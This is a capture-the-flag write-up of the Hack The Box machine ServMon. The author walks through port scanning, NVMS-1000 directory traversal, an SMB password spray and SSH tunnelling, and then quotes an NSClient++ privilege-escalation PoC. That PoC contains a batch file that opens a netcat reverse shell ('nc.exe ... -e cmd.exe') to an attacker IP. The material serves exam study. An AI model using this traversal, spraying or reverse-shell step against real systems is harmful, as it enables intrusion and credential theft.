# Port Scanning - Nmap
First, I performed a SYN scan against all 65,535 TCP ports (`-p-`), skipping host discovery and DNS resolution (`-Pn -n`) and listing only open ports (`--open`):
```bash
┌──(parallels㉿kali-linux-2024-2)-[~/Desktop]
└─$ sudo nmap -sS $IP -Pn -n --open --min-rate 3000 -p-
[sudo] password for parallels:
Starting Nmap 7.95 ( https://nmap.org ) at 2025-06-17 21:17 CDT
Nmap scan report for 10.10.10.184
Host is up (0.054s latency).
Not shown: 65518 closed tcp ports (reset)
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
80/tcp open http
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
5666/tcp open nrpe
6063/tcp open x11
6699/tcp open napster
8443/tcp open https-alt
49664/tcp open unknown
49665/tcp open unknown
49666/tcp open unknown
49667/tcp open unknown
49668/tcp open unknown
49669/tcp open unknown
49670/tcp open unknown
```
Next, I ran a default-script and version-detection scan (`-sC -sV`) against the open ports found. Without `sudo` nmap falls back to a TCP connect scan, which is fine for this step.
```bash
┌──(parallels㉿kali-linux-2024-2)-[~/Desktop]
└─$ nmap -sC -sV $IP -p 21,22,80,135,139,445,5666,6063,6699,8443,49664-49670
Starting Nmap 7.95 ( https://nmap.org ) at 2025-06-17 21:20 CDT
Nmap scan report for 10.10.10.184
Host is up (0.054s latency).
PORT STATE SERVICE VERSION
21/tcp open ftp Microsoft ftpd
| ftp-syst:
|_ SYST: Windows_NT
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_02-28-22 07:35PM <DIR> Users
22/tcp open ssh OpenSSH for_Windows_8.0 (protocol 2.0)
| ssh-hostkey:
| 3072 c7:1a:f6:81:ca:17:78:d0:27:db:cd:46:2a:09:2b:54 (RSA)
| 256 3e:63:ef:3b:6e:3e:4a:90:f3:4c:02:e9:40:67:2e:42 (ECDSA)
|_ 256 5a:48:c8:cd:39:78:21:29:ef:fb:ae:82:1d:03:ad:af (ED25519)
80/tcp open http
|_http-title: Site doesn't have a title (text/html).
| fingerprint-strings:
| GetRequest, HTTPOptions, RTSPRequest:
| HTTP/1.1 200 OK
| Content-type: text/html
| Content-Length: 340
| Connection: close
| AuthInfo:
| <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
| <html xmlns="http://www.w3.org/1999/xhtml">
| <head>
| <title></title>
| <script type="text/javascript">
| window.location.href = "Pages/login.htm";
| </script>
| </head>
| <body>
| </body>
| </html>
| NULL:
| HTTP/1.1 408 Request Timeout
| Content-type: text/html
| Content-Length: 0
| Connection: close
|_ AuthInfo:
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
5666/tcp open tcpwrapped
6063/tcp open tcpwrapped
6699/tcp open tcpwrapped
8443/tcp open ssl/https-alt
|_ssl-date: TLS randomness does not represent time
| fingerprint-strings:
| FourOhFourRequest, HTTPOptions, RTSPRequest, SIPOptions:
| HTTP/1.1 404
| Content-Length: 18
| Document not found
| GetRequest:
| HTTP/1.1 302
| Content-Length: 0
| Location: /index.html
| iday
|_ :Saturday
| http-title: NSClient++
|_Requested resource was /index.html
| ssl-cert: Subject: commonName=localhost
| Not valid before: 2020-01-14T13:24:20
|_Not valid after: 2021-01-13T13:24:20
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49668/tcp open msrpc Microsoft Windows RPC
49669/tcp open msrpc Microsoft Windows RPC
49670/tcp open msrpc Microsoft Windows RPC
2 services unrecognized despite returning data. If you know the service/version, please submit the following fingerprints at https://nmap.org/cgi-bin/submit.cgi?new-service :
==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
SF-Port80-TCP:V=7.95%I=7%D=6/17%Time=6852225C%P=aarch64-unknown-linux-gnu%
SF:r(NULL,6B,"HTTP/1\.1\x20408\x20Request\x20Timeout\r\nContent-type:\x20t
SF:ext/html\r\nContent-Length:\x200\r\nConnection:\x20close\r\nAuthInfo:\x
SF:20\r\n\r\n")%r(GetRequest,1B4,"HTTP/1\.1\x20200\x20OK\r\nContent-type:\
SF:x20text/html\r\nContent-Length:\x20340\r\nConnection:\x20close\r\nAuthI
SF:nfo:\x20\r\n\r\n\xef\xbb\xbf<!DOCTYPE\x20html\x20PUBLIC\x20\"-//W3C//DT
SF:D\x20XHTML\x201\.0\x20Transitional//EN\"\x20\"http://www\.w3\.org/TR/xh
SF:tml1/DTD/xhtml1-transitional\.dtd\">\r\n\r\n<html\x20xmlns=\"http://www
SF:\.w3\.org/1999/xhtml\">\r\n<head>\r\n\x20\x20\x20\x20<title></title>\r\
SF:n\x20\x20\x20\x20<script\x20type=\"text/javascript\">\r\n\x20\x20\x20\x
SF:20\x20\x20\x20\x20window\.location\.href\x20=\x20\"Pages/login\.htm\";\
SF:r\n\x20\x20\x20\x20</script>\r\n</head>\r\n<body>\r\n</body>\r\n</html>
SF:\r\n")%r(HTTPOptions,1B4,"HTTP/1\.1\x20200\x20OK\r\nContent-type:\x20te
SF:xt/html\r\nContent-Length:\x20340\r\nConnection:\x20close\r\nAuthInfo:\
SF:x20\r\n\r\n\xef\xbb\xbf<!DOCTYPE\x20html\x20PUBLIC\x20\"-//W3C//DTD\x20
SF:XHTML\x201\.0\x20Transitional//EN\"\x20\"http://www\.w3\.org/TR/xhtml1/
SF:DTD/xhtml1-transitional\.dtd\">\r\n\r\n<html\x20xmlns=\"http://www\.w3\
SF:.org/1999/xhtml\">\r\n<head>\r\n\x20\x20\x20\x20<title></title>\r\n\x20
SF:\x20\x20\x20<script\x20type=\"text/javascript\">\r\n\x20\x20\x20\x20\x2
SF:0\x20\x20\x20window\.location\.href\x20=\x20\"Pages/login\.htm\";\r\n\x
SF:20\x20\x20\x20</script>\r\n</head>\r\n<body>\r\n</body>\r\n</html>\r\n"
SF:)%r(RTSPRequest,1B4,"HTTP/1\.1\x20200\x20OK\r\nContent-type:\x20text/ht
SF:ml\r\nContent-Length:\x20340\r\nConnection:\x20close\r\nAuthInfo:\x20\r
SF:\n\r\n\xef\xbb\xbf<!DOCTYPE\x20html\x20PUBLIC\x20\"-//W3C//DTD\x20XHTML
SF:\x201\.0\x20Transitional//EN\"\x20\"http://www\.w3\.org/TR/xhtml1/DTD/x
SF:html1-transitional\.dtd\">\r\n\r\n<html\x20xmlns=\"http://www\.w3\.org/
SF:1999/xhtml\">\r\n<head>\r\n\x20\x20\x20\x20<title></title>\r\n\x20\x20\
SF:x20\x20<script\x20type=\"text/javascript\">\r\n\x20\x20\x20\x20\x20\x20
SF:\x20\x20window\.location\.href\x20=\x20\"Pages/login\.htm\";\r\n\x20\x2
SF:0\x20\x20</script>\r\n</head>\r\n<body>\r\n</body>\r\n</html>\r\n");
==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
SF-Port8443-TCP:V=7.95%T=SSL%I=7%D=6/17%Time=68522264%P=aarch64-unknown-li
SF:nux-gnu%r(GetRequest,74,"HTTP/1\.1\x20302\r\nContent-Length:\x200\r\nLo
SF:cation:\x20/index\.html\r\n\r\n\0\0\0\0\0\0\0\0\0\0iday\0\0\0\0:Saturda
SF:y\0\0\0s\0d\0a\0y\0:\0T\0h\0u\0:\0T\0h\0u\0r\0s\0")%r(HTTPOptions,36,"H
SF:TTP/1\.1\x20404\r\nContent-Length:\x2018\r\n\r\nDocument\x20not\x20foun
SF:d")%r(FourOhFourRequest,36,"HTTP/1\.1\x20404\r\nContent-Length:\x2018\r
SF:\n\r\nDocument\x20not\x20found")%r(RTSPRequest,36,"HTTP/1\.1\x20404\r\n
SF:Content-Length:\x2018\r\n\r\nDocument\x20not\x20found")%r(SIPOptions,36
SF:,"HTTP/1\.1\x20404\r\nContent-Length:\x2018\r\n\r\nDocument\x20not\x20f
SF:ound");
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2025-06-18T01:22:06
|_ start_date: N/A
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled but not required
|_clock-skew: -1h00m00s
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 126.83 seconds
```
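The port list in the second command above was typed by hand. The small bash helper below, added here as an example and not part of the original write-up, builds that `-p` list from the first scan's output so nothing is retyped or missed. It reads nmap's normal output (an `-oN` file or a saved terminal capture) and keeps only ports whose state is exactly `open`; `closed` and `open|filtered` lines, which the UDP scan below is full of, are skipped. The sample scan text inside the block is constructed to mirror the output above.

```shell
# Added example, not part of the original write-up: build the "-p" list for
# the second scan from the first scan's output instead of retyping ports.

open_ports_from_nmap() {
    awk '
        # nmap port lines look like "21/tcp   open  ftp"
        $1 ~ /^[0-9]+\/(tcp|udp)$/ && $2 == "open" {
            split($1, parts, "/")
            list = list (list == "" ? "" : ",") parts[1]
        }
        END { print list }
    ' "$1"
}

sample_scan_file() {
    # Constructed sample mirroring the SYN scan output above, plus two
    # lines that must NOT make it into the list.
    f=$(mktemp)
    cat > "$f" <<'EOF'
Nmap scan report for 10.10.10.184
Host is up (0.054s latency).
Not shown: 65518 closed tcp ports (reset)
PORT     STATE         SERVICE
21/tcp   open          ftp
22/tcp   open          ssh
80/tcp   open          http
445/tcp  open          microsoft-ds
5666/tcp open          nrpe
8443/tcp open          https-alt
829/udp  closed        pkix-3-ca-ra
161/udp  open|filtered snmp
EOF
    echo "$f"
}

ports=$(open_ports_from_nmap "$(sample_scan_file)")
echo "$ports"    # 21,22,80,445,5666,8443

# Real run, same flags as the write-up, with the generated list:
#   sudo nmap -sS "$IP" -Pn -n --open --min-rate 3000 -p- -oN full.nmap
#   sudo nmap -sC -sV "$IP" -p "$(open_ports_from_nmap full.nmap)" -oN detail.nmap
```

Saving the first scan with `-oN` is what makes this work; the helper is just a filter over that file, so it also runs over a pasted terminal capture.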
Finally, a scan of the top 1,000 UDP ports. Everything except one closed port came back `open|filtered`, which only means no reply was received within the scan window; at this rate the UDP results are inconclusive rather than a list of open services.
```bash
┌──(parallels㉿kali-linux-2024-2)-[~/Desktop]
└─$ nmap -sU $IP --min-rate 3000 --top-ports 1000
Starting Nmap 7.95 ( https://nmap.org ) at 2025-06-17 21:25 CDT
Nmap scan report for 10.10.10.184
Host is up (0.044s latency).
Not shown: 999 open|filtered udp ports (no-response)
PORT STATE SERVICE
829/udp closed pkix-3-ca-ra
Nmap done: 1 IP address (1 host up) scanned in 1.20 seconds
```
# Footprinting
### FTP - Port 21
From the Nmap results we can see that the FTP server allows anonymous login, so let's first see what it has for us.
There was a directory named `Users` and, inside it, two directories, `Nadine` and `Nathan`. Nadine's contained a file named `Confidential.txt` and Nathan's a file named `Notes to do.txt`.
```bash
┌──(parallels㉿kali-linux-2024-2)-[~/Desktop]
└─$ ftp $IP
Connected to 10.10.10.184.
220 Microsoft FTP Service
Name (10.10.10.184:parallels): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp> ls
229 Entering Extended Passive Mode (|||51633|)
125 Data connection already open; Transfer starting.
02-28-22 07:35PM <DIR> Users
<SNIP>
02-28-22 07:36PM <DIR> Nadine
02-28-22 07:37PM <DIR> Nathan
<SNIP>
02-28-22 07:36PM 168 Confidential.txt
<SNIP>
02-28-22 07:36PM 182 Notes to do.txt
```
##### Confidential.txt
```bash
┌──(parallels㉿kali-linux-2024-2)-[~/Desktop]
└─$ cat Confidential.txt
Nathan,
I left your Passwords.txt file on your Desktop. Please remove this once you have edited it yourself and place it back into the secure folder.
Regards
Nadine
```
##### Notes to do.txt
```bash
┌──(parallels㉿kali-linux-2024-2)-[~/Desktop]
└─$ cat Notes\ to\ do.txt
1) Change the password for NVMS - Complete
2) Lock down the NSClient Access - Complete
3) Upload the passwords
4) Remove public access to NVMS
5) Place the secret files in SharePoint
```
### SMB - Port 445
I could not list SMB shares without valid credentials; a null session (`-N`) is refused:
```bash
┌──(parallels㉿kali-linux-2024-2)-[~/Desktop]
└─$ smbclient -N -L //$IP/
session setup failed: NT_STATUS_ACCESS_DENIED
```
### HTTPS - Port 8443
Port 8443 is the NSClient++ web interface (the `http-title` in the Nmap output), and it presents a login form, so we need its password first.
![[Pasted image 20250617230933.png]]
### HTTP - Port 80
![[Pasted image 20250617214359.png]]
##### gobuster
gobuster aborts because the server returns a 200 status code for non-existent URLs, so every wordlist entry would look like a hit unless responses of that length (118 bytes) are excluded.
```bash
┌──(parallels㉿kali-linux-2024-2)-[~/Desktop]
└─$ gobuster dir -u http://$IP -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.10.10.184
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
Error: the server returns a status code that matches the provided options for non existing urls. http://10.10.10.184/85317c36-4282-45b5-ba76-4893c3f74f9e => 200 (Length: 118). To continue please exclude the status code or the length
```
I confirmed this with a request for a random path, which also comes back 200 with a 118-byte body:
```bash
┌──(parallels㉿kali-linux-2024-2)-[~/Desktop]
└─$ curl -I http://$IP/wook413
HTTP/1.1 200 OK
Content-type: text/xml
Content-Length: 118
Connection: close
AuthInfo:
```
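The usual way past a server that answers 200 for everything is to measure the size of the bogus page and tell gobuster to drop responses of that length. The helper below is an added example, not part of the original write-up: it parses `Content-Length` from a raw header block, samples two paths that cannot exist so an unstable size is caught before it is used as a filter, and then hands the value to gobuster's `--exclude-length`. It assumes `$IP` holds the target and gobuster 3.x is installed; the header block inside is constructed to match the `curl -I` response above.

```shell
# Added example, not part of the original write-up: calibrate gobuster
# against a server that returns 200 for non-existent paths.

content_length_of() {
    # Extract the Content-Length value from a raw HTTP header block on stdin.
    tr -d '\r' | awk 'tolower($1) == "content-length:" { print $2; exit }'
}

baseline_length() {
    # Ask for two paths that cannot exist; if the soft-404 size is stable,
    # print it, otherwise refuse so a flaky value is not used as a filter.
    base="$1"
    first=$(curl -s -I "$base/$$-no-such-path" | content_length_of)
    second=$(curl -s -I "$base/$$-also-missing" | content_length_of)
    if [ -z "$first" ] || [ "$first" != "$second" ]; then
        echo "soft-404 length unstable or missing ($first / $second)" >&2
        return 1
    fi
    printf '%s\n' "$first"
}

# Constructed headers identical to the curl -I response above; no network needed.
sample_headers='HTTP/1.1 200 OK
Content-type: text/xml
Content-Length: 118
Connection: close
AuthInfo: '
printf '%s\n' "$sample_headers" | content_length_of    # 118

# Against the live host:
#   len=$(baseline_length "http://$IP") && gobuster dir -u "http://$IP" \
#       -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt --exclude-length "$len"
```

`--exclude-length` is a blunt filter: a real page that happens to be 118 bytes would be hidden too, so when the hit list looks thin it is worth re-running with a different signal (for example `-s 200` plus `--exclude-length` of a second probe).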
The web application on port 80 is NVMS-1000, which has a known directory traversal vulnerability.
![[Pasted image 20250617223451.png]]
The PoC in `47774.txt` shows that a request for `/../../../../../../../../../../../../windows/win.ini` returns the contents of `win.ini`: the server does not normalise `../` out of the path, so files anywhere on the drive can be read.
```bash
┌──(parallels㉿kali-linux-2024-2)-[~/Desktop]
└─$ cat 47774.txt
# Title: NVMS-1000 - Directory Traversal
# Date: 2019-12-12
# Author: Numan Türle
# Vendor Homepage: http://en.tvt.net.cn/
# Version : N/A
# Software Link : http://en.tvt.net.cn/products/188.html
POC
---------
GET /../../../../../../../../../../../../windows/win.ini HTTP/1.1
Host: 12.0.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Accept-Encoding: gzip, deflate
Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close
Response
---------
; for 16-bit app support
[fonts]
[extensions]
[mci extensions]
[files]
[Mail]
MAPI=1
```
I followed the PoC and got exactly the same output.
![[Pasted image 20250617223903.png]]
Nadine's note to Nathan says she left `Passwords.txt` on his desktop, so let's see whether the traversal can read that file too.
It returned seven candidate passwords:
```
1nsp3ctTh3Way2Mars!
Th3r34r3To0M4nyTrait0r5!
B3WithM30r4ga1n5tMe
L1k3B1gBut7s@W0rk
0nly7h3y0unGWi11F0l10w
IfH3s4b0Utg0t0H1sH0me
Gr4etN3w5w17hMySk1Pa5$
```
![[Pasted image 20250617224818.png]]
I put the likely usernames in a file named `users` and the seven passwords in a file named `passwords`, then sprayed every combination against SMB:
```bash
┌──(parallels㉿kali-linux-2024-2)-[~/Desktop]
└─$ cat users && cat passwords
administrator
nadine
nathan
1nsp3ctTh3Way2Mars!
Th3r34r3To0M4nyTrait0r5!
B3WithM30r4ga1n5tMe
L1k3B1gBut7s@W0rk
0nly7h3y0unGWi11F0l10w
IfH3s4b0Utg0t0H1sH0me
Gr4etN3w5w17hMySk1Pa5$
```
crackmapexec found one valid pair: `nadine:L1k3B1gBut7s@W0rk`.
```bash
┌──(parallels㉿kali-linux-2024-2)-[~/Desktop]
└─$ crackmapexec smb $IP -u users -p passwords
<SNIP>
SMB 10.10.10.184 445 SERVMON [*] Windows 10 / Server 2019 Build 17763 x64 (name:SERVMON) (domain:ServMon) (signing:False) (SMBv1:False)
SMB 10.10.10.184 445 SERVMON [-] ServMon\administrator:1nsp3ctTh3Way2Mars! STATUS_LOGON_FAILURE
SMB 10.10.10.184 445 SERVMON [-] ServMon\administrator:Th3r34r3To0M4nyTrait0r5! STATUS_LOGON_FAILURE
SMB 10.10.10.184 445 SERVMON [-] ServMon\administrator:B3WithM30r4ga1n5tMe STATUS_LOGON_FAILURE
SMB 10.10.10.184 445 SERVMON [-] ServMon\administrator:L1k3B1gBut7s@W0rk STATUS_LOGON_FAILURE
SMB 10.10.10.184 445 SERVMON [-] ServMon\administrator:0nly7h3y0unGWi11F0l10w STATUS_LOGON_FAILURE
SMB 10.10.10.184 445 SERVMON [-] ServMon\administrator:IfH3s4b0Utg0t0H1sH0me STATUS_LOGON_FAILURE
SMB 10.10.10.184 445 SERVMON [-] ServMon\administrator:Gr4etN3w5w17hMySk1Pa5$ STATUS_LOGON_FAILURE
SMB 10.10.10.184 445 SERVMON [-] ServMon\nadine:1nsp3ctTh3Way2Mars! STATUS_LOGON_FAILURE
SMB 10.10.10.184 445 SERVMON [-] ServMon\nadine:Th3r34r3To0M4nyTrait0r5! STATUS_LOGON_FAILURE
SMB 10.10.10.184 445 SERVMON [-] ServMon\nadine:B3WithM30r4ga1n5tMe STATUS_LOGON_FAILURE
SMB 10.10.10.184 445 SERVMON [+] ServMon\nadine:L1k3B1gBut7s@W0rk
```
The same credentials work for SSH (OpenSSH for Windows on port 22):
```cmd
Microsoft Windows [Version 10.0.17763.864]
(c) 2018 Microsoft Corporation. All rights reserved.
nadine@SERVMON C:\Users\Nadine>whoami
servmon\nadine
nadine@SERVMON C:\Users\Nadine>
```
The `user.txt` flag is on Nadine's desktop:
```cmd
nadine@SERVMON C:\Users\Nadine\Desktop>dir
Volume in drive C has no label.
Volume Serial Number is 20C1-47A1
Directory of C:\Users\Nadine\Desktop
06/17/2025 01:14 PM <DIR> .
06/17/2025 01:14 PM <DIR> ..
06/17/2025 01:14 PM 378 evil.bat
06/17/2025 01:14 PM 59,392 nc.exe
06/17/2025 10:37 AM 34 user.txt
06/17/2025 12:01 PM 10,156,032 winPEASany.exe
4 File(s) 10,215,836 bytes
2 Dir(s) 6,246,989,824 bytes free
nadine@SERVMON C:\Users\Nadine\Desktop>type user.txt
fd97...
```
# Privilege Escalation
`C:\Program Files\NSClient++\nsclient.ini` is readable as nadine and contains what appears to be the password for the web interface on port 8443, together with an `allowed hosts` restriction:
```cmd
nadine@SERVMON C:\Program Files\NSClient++>type nsclient.ini
# If you want to fill this file with all available options run the following command:
# nscp settings --generate --add-defaults --load-all
# If you want to activate a module and bring in all its options use:
# nscp settings --activate-module <MODULE NAME> --add-defaults
# For details run: nscp settings --help
; in flight - TODO
[/settings/default]
; Undocumented key
password = ew2x6SsGTxjRwXOT
; Undocumented key
allowed hosts = 127.0.0.1
```
Alternatively, clicking `Forgotten password?` on the login page shows a pop-up with a command that prints the current password.
![[Pasted image 20250617231242.png]]
Running that command on the box returns the same password:
```cmd
nadine@SERVMON C:\Program Files\NSClient++>nscp web -- password --display
Current password: ew2x6SsGTxjRwXOT
```
However, I still cannot log in with that password from my attacking machine. Why?
![[Pasted image 20250617231655.png]]
Back in `nsclient.ini`, `allowed hosts = 127.0.0.1` means the web server only accepts connections that arrive from the loopback address, so a login from my attacking machine is rejected regardless of the password:
```cmd
; in flight - TODO
[/settings/default]
; Undocumented key
password = ew2x6SsGTxjRwXOT
; Undocumented key
allowed hosts = 127.0.0.1
```
The way around that is SSH local port forwarding. The command below does the following:
- My machine connects over SSH to `$IP` (10.10.10.184) as the user `nadine`.
- Once the session is established, anything that connects to port 8443 on my local machine is carried through the SSH tunnel to the remote server.
- sshd on the remote server then opens a connection to its own `127.0.0.1:8443`, so NSClient++ sees a client coming from the loopback address, which is exactly what `allowed hosts` permits.
```bash
┌──(parallels㉿kali-linux-2024-2)-[~/Desktop]
└─$ ssh nadine@$IP -L 8443:127.0.0.1:8443
nadine@10.10.10.184's password:
```
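The same forward, run in the background and verified before the browser is opened, as an added example that is not part of the original write-up. `-N` asks for no remote shell and `-f` backgrounds ssh after authentication; binding the local end to `127.0.0.1` keeps the forwarded admin interface off the lab network. The `ss -tln` output inside the block is constructed so the listener check runs without a live session; `$IP` is assumed to hold the target and the password is typed at the prompt.

```shell
# Added example, not part of the original write-up: background the local
# forward to NSClient++ and confirm it is up before using it.

open_tunnel() {
    # -L [bind_addr:]port:host:hostport; the remote side connects to its own
    # loopback, which is the only source "allowed hosts = 127.0.0.1" accepts.
    ssh -f -N -L 127.0.0.1:8443:127.0.0.1:8443 "nadine@$IP"
}

listener_present() {
    # Read "ss -tln" output on stdin and succeed if something LISTENs on port $1.
    awk -v want="$1" '
        $1 == "LISTEN" {
            n = split($4, addr, ":")     # Local Address:Port, IPv6 included
            if (addr[n] == want) found = 1
        }
        END { exit !found }'
}

tunnel_answers() {
    # Through the tunnel the web UI redirects / to /index.html (302), which is
    # what nmap saw on 8443 directly; 200 covers a request for index.html itself.
    code=$(curl -sk -o /dev/null -w '%{http_code}' "https://127.0.0.1:8443/$1")
    [ "$code" = "302" ] || [ "$code" = "200" ]
}

# Constructed ss output showing the forward in place; no ssh session needed to run this.
sample_ss='State  Recv-Q Send-Q Local Address:Port Peer Address:Port Process
LISTEN 0      128    127.0.0.1:8443     0.0.0.0:*
LISTEN 0      128    0.0.0.0:22         0.0.0.0:*'
printf '%s\n' "$sample_ss" | listener_present 8443 && echo "forward is listening"

# Against the live host:
#   open_tunnel && ss -tln | listener_present 8443 && tunnel_answers "" \
#       && firefox https://127.0.0.1:8443/
```

Nothing about the tunnel bypasses authentication; its only effect is the source address NSClient++ sees. The certificate on 8443 is self-signed and expired (see the `ssl-cert` output above), hence `-k` on the curl check.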
With the tunnel in place I was able to log in with the password found. Notice that the host in the URL is `127.0.0.1`:
![[Pasted image 20250617232802.png]]
searchsploit lists an NSClient++ exploit that specifically targets privilege escalation.
![[Pasted image 20250617233859.png]]
This is the exploit's description and PoC:
```
Exploit Author: bzyo
Twitter: @bzyo_
Exploit Title: NSClient++ 0.5.2.35 - Privilege Escalation
Date: 05-05-19
Vulnerable Software: NSClient++ 0.5.2.35
Vendor Homepage: http://nsclient.org/
Version: 0.5.2.35
Software Link: http://nsclient.org/download/
Tested on: Windows 10 x64
Details:
When NSClient++ is installed with Web Server enabled, local low privilege users have the ability to read the web administrator's password in cleartext from the configuration file. From here a user is able to login to the web server and make changes to the configuration file that is normally restricted.
The user is able to enable the modules to check external scripts and schedule those scripts to run. There doesn't seem to be restrictions on where the scripts are called from, so the user can create the script anywhere. Since the NSClient++ Service runs as Local System, these scheduled scripts run as that user and the low privilege user can gain privilege escalation. A reboot, as far as I can tell, is required to reload and read the changes to the web config.
Prerequisites:
To successfully exploit this vulnerability, an attacker must already have local access to a system running NSClient++ with Web Server enabled using a low privileged user account with the ability to reboot the system.
Exploit:
1. Grab web administrator password
- open c:\program files\nsclient++\nsclient.ini
or
- run the following that is instructed when you select forget password
C:\Program Files\NSClient++>nscp web -- password --display
Current password: SoSecret
2. Login and enable following modules including enable at startup and save configuration
- CheckExternalScripts
- Scheduler
3. Download nc.exe and evil.bat to c:\temp from attacking machine
@echo off
c:\temp\nc.exe 192.168.0.163 443 -e cmd.exe
4. Setup listener on attacking machine
nc -nlvvp 443
5. Add script foobar to call evil.bat and save settings
- Settings > External Scripts > Scripts
- Add New
- foobar
command = c:\temp\evil.bat
6. Add schedule to call script every 1 minute and save settings
- Settings > Scheduler > Schedules
- Add new
- foobar
interval = 1m
command = foobar
7. Restart the computer and wait for the reverse shell on attacking machine
nc -nlvvp 443
listening on [any] 443 ...
connect to [192.168.0.163] from (UNKNOWN) [192.168.0.117] 49671
Microsoft Windows [Version 10.0.17134.753]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Program Files\NSClient++>whoami
whoami
nt authority\system
Risk:
The vulnerability allows local attackers to escalate privileges and execute arbitrary code as Local System
```
I was unable to finish the privilege escalation and get the `root.txt` flag. I looked up other people's write-ups, including the one by the popular `0xdf`. People have been voicing how unstable this box is, especially the PE part. Anyway, I learned a ton doing this box, even up to the PE point, so I have no complaints. The whole purpose of doing the boxes on LainKusanagi's list is to learn and study for the OSCP, not to pwn more HTB boxes.